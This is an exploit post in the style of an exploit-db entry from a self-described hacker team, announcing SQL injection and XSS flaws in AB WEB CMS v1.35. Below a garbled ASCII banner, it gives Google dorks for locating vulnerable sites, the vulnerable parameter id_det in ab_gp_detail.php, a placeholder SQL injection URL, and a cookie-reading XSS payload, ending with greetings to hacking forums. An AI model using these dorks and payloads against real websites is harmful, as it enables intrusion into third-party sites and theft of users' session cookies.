**************************************************************************************************** * _______ ___________.__ ___________.__* *____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____* * /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ * *| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ * *|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ * * \/ \/ \/ \/ \/\/ \/* *.____ __* *______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ * * /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \* * \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ * */____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ * * \/ \/ \/ \/ \/ \/\/* *Pr!v8 Expl0iT AND t00L ** * ** *ALGERIAN HACKERS* *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!]AB WEB CMS V.1.35 Multiple Remote Vulnerabilities [!] Author: Dr.0rYX and Cr3w-DZ [!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> [!] greet to:WWW.GAZA-HACKER.NET ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.aeline-informatique.com/ [+] script : AB WEB V.1.35 [+] Download : http://www.aeline-informatique.com/contact.php/ (sell script ) [+] Vulnerability : SQL injection / XSS Vulnerability [+] Dork : inurl:"ab_fct.php?fct=" inurl:" ab_gp_detail.php?id_det=" **************************************************************************/ [ Vulnerable File 1] http://server/[path]/ab_gp_detail.php?id_det=sql[N.A.S.T ] [path] : fr , de [ Exploit 1 ] http://server/fr/ab_gp_detail.php?id_det=SQL INJECTION *************************************************************************/ [ Vulnerable File 2] http://server/fr/ab_gp_detail.php?id_det=xss[N.A.S.T ] [ Exploit 2 ] http://www.server/fr/ab_gp_detail.php?id_det='><script>alert(document.cookie)</script> [GReet ] [+] :WWW.Gaza-hacker.net ,WWW.evilzone.org , WWW.sec4ever.com , Exploit-db.com , ALL HACKERS MUSLIMS
体验盒子
